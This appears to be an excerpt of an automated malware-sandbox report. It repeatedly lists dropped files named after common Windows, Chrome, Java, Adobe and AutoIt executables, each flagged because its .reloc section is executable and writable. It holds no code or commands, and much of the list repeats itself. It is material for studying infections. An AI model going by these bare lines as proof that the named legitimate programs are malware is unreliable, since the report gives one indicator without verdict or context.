Source: AutoIt3_x64.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: appvcleaner.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SciTE.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVShNotify.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeARMHelper.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: IntegratedOffice.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MavInject32.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: OfficeC2RClient.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: officesvcmgr.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_pwa_launcher.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrmstp.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe0.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jaureg.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jucheck.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jusched.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler64.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdate.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateBroker.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateComRegisterShell64.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateCore.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateOnDemand.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.132_chrome_installer.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe0.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe0.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe0.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msdtc.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msiexec.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: PerceptionSimulationService.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: perfhost.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Locator.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MsSense.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SensorDataService.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: snmptrap.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Spectrum.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssh-agent.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: TieringEngineService.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe1.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AgentService.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: vds.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: VSSVC.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wbengine.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WmiApSrv.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wmpnetwk.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SearchIndexer.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: Acrobat.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info_x64.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3_x64.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: appvcleaner.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SciTE.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVShNotify.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeARMHelper.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: IntegratedOffice.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MavInject32.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: OfficeC2RClient.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: officesvcmgr.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_pwa_launcher.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrmstp.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe0.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jaureg.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jucheck.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jusched.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler64.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdate.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateBroker.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
